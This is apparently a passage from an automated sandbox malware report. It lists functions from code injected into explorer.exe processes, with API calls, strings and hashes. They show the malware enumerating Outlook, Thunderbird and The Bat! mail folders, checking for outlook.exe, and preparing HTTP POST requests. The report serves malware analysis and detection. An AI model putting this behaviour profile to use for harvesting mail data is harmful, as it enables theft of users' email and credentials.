Instruction Fuzzy Hash: C7018175644306AF8B019F26D8189AF7BEEFFC4651B10883EF959D3210DF31C9149B20

Function 02971953 Relevance: 6.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,00000000,?,?,02972F0C), ref: 02971973
lstrlenW.KERNEL32(029C6564,?,?,02972F0C), ref: 02971978
lstrcatW.KERNEL32(00000000,?,?,?,02972F0C), ref: 02971990
lstrcatW.KERNEL32(00000000,029C6564,?,?,02972F0C), ref: 02971994

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: a3943f9a109174114b4eb976d2fada5b948b33a430b416a55d84494bc3b09826
Instruction ID: 2aa27f9bf11161066d619f2c816a44816dabb49af4dcc2d65dc19cf4dafe6da9
Opcode Fuzzy Hash: a3943f9a109174114b4eb976d2fada5b948b33a430b416a55d84494bc3b09826
Instruction Fuzzy Hash: 4CE09B6270421C5B4714B6AEAC94E7B77DDCEC95E53150039FA08E3301FE56DC0546B0

Function 0299F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 02976A81: memset.NTDLL ref: 02976A9C

_aulldiv.NTDLL(?,00000000,?,00000000), ref: 0299F2A1

Strings

%llu, xrefs: 0299F2A8
%llu, xrefs: 0299F25E

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _aulldivmemset
String ID: %llu$%llu
API String ID: 714058258-4283164361
Opcode ID: 85dff4ea25f6a9a3f77b2255aa1bdb0ac8dc22ce52739d47e98b177ca5a05e57
Instruction ID: 0586a2701540031e645aa5f8926eca33cc1ed3b5b1ceed3bd10d166748790291
Opcode Fuzzy Hash: 85dff4ea25f6a9a3f77b2255aa1bdb0ac8dc22ce52739d47e98b177ca5a05e57
Instruction Fuzzy Hash: 8821D1B26406056BDB10AA68CC41F7FB75EAFC1730F444628F92197AC0DB21AD11CFE1

Function 0298203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,?), ref: 02982174
_allmul.NTDLL(?,?,?,00000000), ref: 0298220E
_allmul.NTDLL(?,00000000,00000000,?), ref: 02982241
_allmul.NTDLL(02972E26,00000000,?,?), ref: 02982295

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: _allmul
String ID:
API String ID: 4029198491-0
Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction ID: bde2fe944bbc6a450bbc95cf3e16d521cb50827fcf09f8b74b77cb235c28d352
Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
Instruction Fuzzy Hash: 9DA16C70B087419FDB18EF68C890A2EB7EAAFC8704F54492DFA5597250EB70EC45CB42

Function 029878B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON

Download Yara Rule

APIs

memcpy.NTDLL(?,?,?,?), ref: 02987979
memset.NTDLL ref: 0298798A
memcpy.NTDLL(?,?,?), ref: 02987A00
memset.NTDLL ref: 02987A14

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: memcpymemset
String ID:
API String ID: 1297977491-0
Opcode ID: 149cceb6e52344a524511a2b9635e638a1256b95a8a15f06321815aa01397661
Instruction ID: 846c89658228eb4450ff9e1ebca2e7ea0848d5b41870de9a6de8ecc69fb6b8e3
Opcode Fuzzy Hash: 149cceb6e52344a524511a2b9635e638a1256b95a8a15f06321815aa01397661
Instruction Fuzzy Hash: F58190756083159FC350EF68C880A6BBBEAFFC8704F18496DF88A97251D771E904CB92

Function 0297190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,?,?,00000000,02972783), ref: 0297192B
lstrlen.KERNEL32(00000000,?,?,?,00000000,02972783), ref: 02971930
lstrcat.KERNEL32(00000000,?), ref: 02971946
lstrcat.KERNEL32(00000000,00000000), ref: 0297194A

Memory Dump Source

Source File: 00000013.00000002.2014011974.0000000002971000.00000040.80000000.00040000.00000000.sdmp, Offset: 02971000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_2971000_explorer.jbxd

Similarity

API ID: lstrcatlstrlen
String ID:
API String ID: 1475610065-0
Opcode ID: ee9eb3e0259577867b2b47ffdd4cad3ded3e1d99f59095cfa2d2f75657a0e0bb
Instruction ID: 178edabd510c6909490175e2bd9321ce01868372ca2864d9bad280508d04c32b
Opcode Fuzzy Hash: ee9eb3e0259577867b2b47ffdd4cad3ded3e1d99f59095cfa2d2f75657a0e0bb
Instruction Fuzzy Hash: A8E092A370421C2B472476AEAC94E7B76DDDAC95A53190039FA08D3302EE56AC0286B0

Analysis Process: explorer.exePID: 2312, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	21.4%
Dynamic/Decrypted Code Coverage:	86.8%
Signature Coverage:	0%
Total number of Nodes:	182
Total number of Limit Nodes:	17

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00FD30A8 Relevance: 4.7, APIs: 3, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE ref: 00FD3104
FindNextFileW.KERNELBASE ref: 00FD3218
FindClose.KERNELBASE ref: 00FD3229

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction ID: c5286b12d42ecf8fe891c2542af54ce496155aa332770ebe592a0ddb1ffd69c4
Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
Instruction Fuzzy Hash: C1419731718B4D5FDB94FB3888487AA73D3FBD4351F484A2AA44AC3351EE78D904A782

Function 00FD38B0 Relevance: 1.5, APIs: 1, Instructions: 40
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtUnmapViewOfSection.NTDLL ref: 00FD38F2

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: SectionUnmapView
String ID:
API String ID: 498011366-0
Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction ID: 0dd3941ae9ee3339cbeab319f3abe7ef70da7af7580dd3f738a7d92645d82cc4
Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
Instruction Fuzzy Hash: C5F0A020F11A081BEB6C77BD685D3283282EB58310F58052BB615C33D2DC3D8A45A303

Function 00FD2774 Relevance: 6.1, APIs: 4, Instructions: 124
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE ref: 00FD27C7
RegQueryValueExW.KERNELBASE ref: 00FD27F4
RegQueryValueExW.KERNELBASE ref: 00FD283A
RegCloseKey.KERNELBASE ref: 00FD2860

Part of subcall function 00FD1860: RtlFreeHeap.NTDLL ref: 00FD1880

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: QueryValue$CloseFreeHeapOpen
String ID:
API String ID: 1641618270-0
Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction ID: ffbee80049ce16acacb8c6a1400c9ac0cf10029c98c62b59ed8c5db4678ce1b8
Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
Instruction Fuzzy Hash: D5319630608B488FE7A9DB28D45477A77D1FBB8355F58062FE48AC3364DF24C845A782

Function 00FD372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCreateKeyExW.KERNELBASE ref: 00FD37B2
RegCloseKey.KERNELBASE ref: 00FD37C1

Strings

?, xrefs: 00FD37A2

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: CloseCreate
String ID: ?
API String ID: 2932200918-1684325040
Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction ID: 9f3368acaaa0577113775f40c831f12b330563c758035d8655361bdec16ffd5c
Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
Instruction Fuzzy Hash: 31119070608B488FD750DF69D48866AB7E2FB98305F44062FE48AC3320DF389985DB82

Function 00FDA298 Relevance: 4.8, APIs: 3, Instructions: 252
memorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNELBASE ref: 00FDA397
VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00FDA441
VirtualProtect.KERNELBASE ref: 00FDA45F

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD9000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD9000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd9000_explorer.jbxd

Similarity

API ID: ProtectVirtual$LibraryLoad
String ID:
API String ID: 895956442-0
Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction ID: 033e6cb75f2d339311f962f13fa8ac06e493cc9ff1ce6d36be3001a00a9229db
Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
Instruction Fuzzy Hash: 4B51383265891D4BCB24AA789C843E5B3D3F755332B1C062BC49AC3385E65AD846A38B

Function 00FD3254 Relevance: 4.7, APIs: 3, Instructions: 210
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00FD298C: GetFileAttributesW.KERNELBASE ref: 00FD299E

GetPrivateProfileSectionNamesW.KERNEL32 ref: 00FD330F
GetPrivateProfileStringW.KERNEL32 ref: 00FD336F
GetPrivateProfileIntW.KERNEL32 ref: 00FD338C

Part of subcall function 00FD30A8: FindFirstFileW.KERNELBASE ref: 00FD3104

Part of subcall function 00FD1860: RtlFreeHeap.NTDLL ref: 00FD1880

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
String ID:
API String ID: 970345848-0
Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction ID: 98762190f259faedb451a6cb0afdba458c809016136ea97be10b50aaa0c0cc32
Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
Instruction Fuzzy Hash: 3851C730B18F094BDB59FB2C9C1663972D3EB99310B48056FE50AC3396EE68DD41A387

Function 00FD3458 Relevance: 4.7, APIs: 3, Instructions: 172
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

StrStrIW.KERNELBASE ref: 00FD347E
RegOpenKeyExW.KERNELBASE ref: 00FD353F
RegEnumKeyExW.KERNELBASE ref: 00FD35D6

Part of subcall function 00FD2774: RegOpenKeyExW.KERNELBASE ref: 00FD27C7
Part of subcall function 00FD2774: RegQueryValueExW.KERNELBASE ref: 00FD27F4
Part of subcall function 00FD2774: RegQueryValueExW.KERNELBASE ref: 00FD283A
Part of subcall function 00FD2774: RegCloseKey.KERNELBASE ref: 00FD2860

Part of subcall function 00FD3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 00FD330F

Part of subcall function 00FD1860: RtlFreeHeap.NTDLL ref: 00FD1880

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
String ID:
API String ID: 1841478724-0
Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction ID: f3e65cf3bdd5e5f06493a66389a7b6447c7609d048a8fec2a00f3f544d148dae
Opcode Fuzzy Hash: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
Instruction Fuzzy Hash: 56416E30B18B494FDB94EF6D985972AB6E2FB98341F08056FA14EC3351DE38D9049782

Function 00FD2938 Relevance: 3.0, APIs: 2, Instructions: 34
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE ref: 00FD2966
CloseHandle.KERNELBASE ref: 00FD297A

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID:
API String ID: 3498533004-0
Opcode ID: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction ID: dea0a8bf4adba25f4ec0e60c775ac0ab8331ae027b12bbb5781cad34d4718dff
Opcode Fuzzy Hash: c2797be9488e4e6f5c36404d807aecabd0db32494513c6dc611a488961ed8fb4
Instruction Fuzzy Hash: 9DF0E57061570A4FE7846FB844A8336F5D0FB18325F1C463EE45AC23D0D7348842A783

Function 00FD22B4 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE ref: 00FD22D0

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: CreateGlobalStream
String ID:
API String ID: 2244384528-0
Opcode ID: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction ID: 5764f455a84df7927f9adbf4a76f3edcbd3895cbc1e77dd59cfc18be86ed9fcc
Opcode Fuzzy Hash: 1de76282c48f0bd08e98a48b657d2df2c7e3f359bfabb3919f08c1342ed29bc7
Instruction Fuzzy Hash: 4FE08C30108B0A8FD798AFBCE4CA07A33A1EBAC252B09053FE005CB114D67988C18791

Function 00FD298C Relevance: 1.5, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE ref: 00FD299E

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction ID: eca2f3f3aecf941ed9b9e45425d9b0fd5d93040edfe0e21cc2854bbc13ad5bcf
Opcode Fuzzy Hash: adac2ff7f887c72d82cf14b017212d62fc95523d70b35a7e56ac7f1322cd4b31
Instruction Fuzzy Hash: EDD05B22A1190D076B9425F508E92792051D739335B1C0227E935C13A0D285C895B282

Function 00FD1860 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL ref: 00FD1880

Memory Dump Source

Source File: 00000014.00000002.1992319076.0000000000FD1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FD1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_fd1000_explorer.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction ID: 45b91d7e6c454f8d0c629c9f8d05ad7dcd7e7c2f6448e312f76a0737b00fac9a
Opcode Fuzzy Hash: d99d8c33ae82ccdfde5110b6ab349530d41223e3f7429e99417b491f4accb22a
Instruction Fuzzy Hash: B2D01224B16A081BEF2CBBFA1C8D1747AD3F758222B1C8066B819C3352ED3DC895D341

Analysis Process: explorer.exePID: 2796, Parent PID: 3968COMMON

Execution Graph

Execution Coverage:	14.3%
Dynamic/Decrypted Code Coverage:	96.2%
Signature Coverage:	0%
Total number of Nodes:	212
Total number of Limit Nodes:	2

Executed Functions

Function 0320255C Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1

lstrcatW.KERNEL32(00000000,?,032018F4), ref: 03202588
PathAppendW.SHLWAPI(00000000,*.*,?,032018F4), ref: 03202594
FindFirstFileW.KERNELBASE(00000000,?,?,032018F4), ref: 032025A8
RtlZeroMemory.NTDLL(00000209,00000209), ref: 032025C3
lstrcatW.KERNEL32(00000209,?,?,032018F4), ref: 032025E1
PathAppendW.SHLWAPI(00000209,?,?,032018F4), ref: 032025ED
lstrcatW.KERNEL32(00000209,?,?,032018F4), ref: 03202611
PathAppendW.SHLWAPI(00000209,?,?,032018F4), ref: 0320261D
StrStrIW.SHLWAPI(00000209,?,?,032018F4), ref: 0320262C
FindNextFileW.KERNELBASE(00000000,?,?,032018F4), ref: 03202644
FindClose.KERNELBASE(00000000,?,032018F4), ref: 03202653

Strings

*.*, xrefs: 0320258E

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: AppendFindPathlstrcat$FileHeap$AllocateCloseFirstMemoryNextProcessZero
String ID: *.*
API String ID: 1648349226-438819550
Opcode ID: b188307f86fd5911b8f55daf7338bfe1358a6736993a320cda90fd2301858727
Instruction ID: 431f0ab3686e39ce1ac8731749ccb7f7bb8d5a7095a61d2186fb8d41dcc54aa9
Opcode Fuzzy Hash: b188307f86fd5911b8f55daf7338bfe1358a6736993a320cda90fd2301858727
Instruction Fuzzy Hash: 4421C379215306DFD710EF20EA8C96FBBADEF85704F04481EFA9192183DB35854E8666

Function 03201016 Relevance: 3.0, APIs: 2, Instructions: 19
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032027E2: VirtualQuery.KERNEL32(00000000,00000209,0000001C,00000209,03202664,?,032018F4), ref: 032027EF

RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 0320103A
NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 03201043

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: MemoryMoveQuerySectionUnmapViewVirtual
String ID:
API String ID: 1675517319-0
Opcode ID: c230712b75c473da43c90028dde7e42b5c0ef1f7235009ebd5e1092039ae2e71
Instruction ID: a25d0f74ea3281b04809d9f64db59bce51608fd58b40401ef3f725ff96c53e47
Opcode Fuzzy Hash: c230712b75c473da43c90028dde7e42b5c0ef1f7235009ebd5e1092039ae2e71
Instruction Fuzzy Hash: 51D02B39811310A7DF24F7747D0C5DA2A5D9F05230B248601AA948A0C3C87448CC4370

Function 0320104F Relevance: 35.1, APIs: 11, Strings: 9, Instructions: 115
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1

ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 0320107F
ExpandEnvironmentStringsW.KERNEL32(%LOCALAPPDATA%\Microsoft\Outlook,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 03201093
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\Microsoft\Outlook,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010A7
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000005,00000000,?,?,?,0320104E,?,03201010), ref: 032010BB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\Thunderbird,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010D3
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\The Bat!,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010E7
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\The Bat!,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 032010FB
ExpandEnvironmentStringsW.KERNEL32(%APPDATA%\BatMail,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 0320110F
ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%\BatMail,00000000,00000208,?,?,?,0320104E,?,03201010), ref: 03201123
wsprintfA.USER32 ref: 0320116B
ExitProcess.KERNEL32 ref: 03201189

Strings

%APPDATA%\Microsoft\Outlook, xrefs: 0320107A
%ALLUSERSPROFILE%\The Bat!, xrefs: 032010F6
%APPDATA%\The Bat!, xrefs: 032010E2
%ALLUSERSPROFILE%\BatMail, xrefs: 0320111E
%s,, xrefs: 03201165
%ALLUSERSPROFILE%\Microsoft\Outlook, xrefs: 032010A2
%APPDATA%\Thunderbird, xrefs: 032010CE
%LOCALAPPDATA%\Microsoft\Outlook, xrefs: 0320108E
%APPDATA%\BatMail, xrefs: 0320110A

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: EnvironmentExpandStrings$HeapProcess$AllocateExitFolderPathSpecialwsprintf
String ID: %ALLUSERSPROFILE%\BatMail$%ALLUSERSPROFILE%\Microsoft\Outlook$%ALLUSERSPROFILE%\The Bat!$%APPDATA%\BatMail$%APPDATA%\Microsoft\Outlook$%APPDATA%\The Bat!$%APPDATA%\Thunderbird$%LOCALAPPDATA%\Microsoft\Outlook$%s,
API String ID: 1709485025-1688604020
Opcode ID: b1d32baaa20b8654a5715bc026d85b6d8ea040157677768313eddd6287be5679
Instruction ID: 8cc7f5143d54fad375ede67ecdf96dd9cc72f832f9d991a0f05decf1c761dbdb
Opcode Fuzzy Hash: b1d32baaa20b8654a5715bc026d85b6d8ea040157677768313eddd6287be5679
Instruction Fuzzy Hash: 0D31F75D36032A6AE715F3765C48F3F944D8F80F84B084014B945DA2C7DE94AC9D81F1

Function 0320274A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
processstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 03202758
Process32First.KERNEL32(00000000,?), ref: 03202777
lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0320278B
Process32Next.KERNEL32(00000000,00000128), ref: 032027A8
CloseHandle.KERNELBASE(00000000), ref: 032027B3

Strings

outlook.exe, xrefs: 0320277F

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcmpi
String ID: outlook.exe
API String ID: 868014591-749849299
Opcode ID: 978ee4e231549aca6e65a33ab46d44c5c3d02740b4fc3f96df8a91234aa65676
Instruction ID: 4b8a3171994e3cd1c1a96147fda5ebf3d33a82e2fc35ec584c362b46808f570b
Opcode Fuzzy Hash: 978ee4e231549aca6e65a33ab46d44c5c3d02740b4fc3f96df8a91234aa65676
Instruction Fuzzy Hash: E0F0C234512228EBD720FA20AD4CBEE777DAB08324F004591EA88A21D6DB748A9C4A91

Function 03209CF6 Relevance: 3.3, APIs: 2, Instructions: 282
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003208000.00000040.80000000.00040000.00000000.sdmp, Offset: 03208000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3208000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd871161abbac29d783775026a1974c3ff0fd3080387ec1f78afb6c2fcff69e1
Instruction ID: 6a4323c11ab6b860cd22eb92a0a514eed7afed7538bbfbb34b94f39fb85ad9f6
Opcode Fuzzy Hash: fd871161abbac29d783775026a1974c3ff0fd3080387ec1f78afb6c2fcff69e1
Instruction Fuzzy Hash: E19150725753525FD715DE78CCC0AA1BBA4DB43220B1C06AAD4E2CB2E7E79458CDC7A0

Function 032029B7 Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
RtlAllocateHeap.NTDLL(00000000), ref: 032029C1

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: c22bc5fe2c3c3030bb7f736035f637ab7f3edd87cdbd189260036e1a9c2052ca
Instruction ID: e74dbccabdffa68e3aeebfc0054ba802575dcf7eb527b069ccea9f217d762a00
Opcode Fuzzy Hash: c22bc5fe2c3c3030bb7f736035f637ab7f3edd87cdbd189260036e1a9c2052ca
Instruction Fuzzy Hash: F4A002B59512105BDD44B7B6BF0DA157529A744705F008544738585049996454088721

Non-executed Functions

Function 032020A7 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 283
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 032029B7: GetProcessHeap.KERNEL32(00000008,00000412,0320257A,032018F4), ref: 032029BA
Part of subcall function 032029B7: RtlAllocateHeap.NTDLL(00000000), ref: 032029C1

Part of subcall function 03202938: lstrlen.KERNEL32(035170BE,?,00000000,00000000,032020E3,774C8A60,035170BE,00000000), ref: 03202940
Part of subcall function 03202938: MultiByteToWideChar.KERNEL32(00000000,00000000,035170BE,00000001,00000000,00000000), ref: 03202952

Part of subcall function 032024CC: RtlZeroMemory.NTDLL(?,00000018), ref: 032024DE

RtlZeroMemory.NTDLL(?,0000003C), ref: 0320213F
wsprintfW.USER32 ref: 03202278
wsprintfW.USER32 ref: 032022E3
RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 032023AD

Strings

Host: %s, xrefs: 032022DD
POST, xrefs: 03202229
Accept: */*Referer: %S, xrefs: 0320226E
Content-Type: application/x-www-form-urlencoded, xrefs: 03202307

Memory Dump Source

Source File: 00000015.00000002.1997611878.0000000003201000.00000040.80000000.00040000.00000000.sdmp, Offset: 03201000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_3201000_explorer.jbxd

Similarity

API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
API String ID: 4204651544-1701262698
Opcode ID: 5a5eb2af261c3e2777a2001d21d26342fefcbd72fc0d5bb9121479b3ba798328
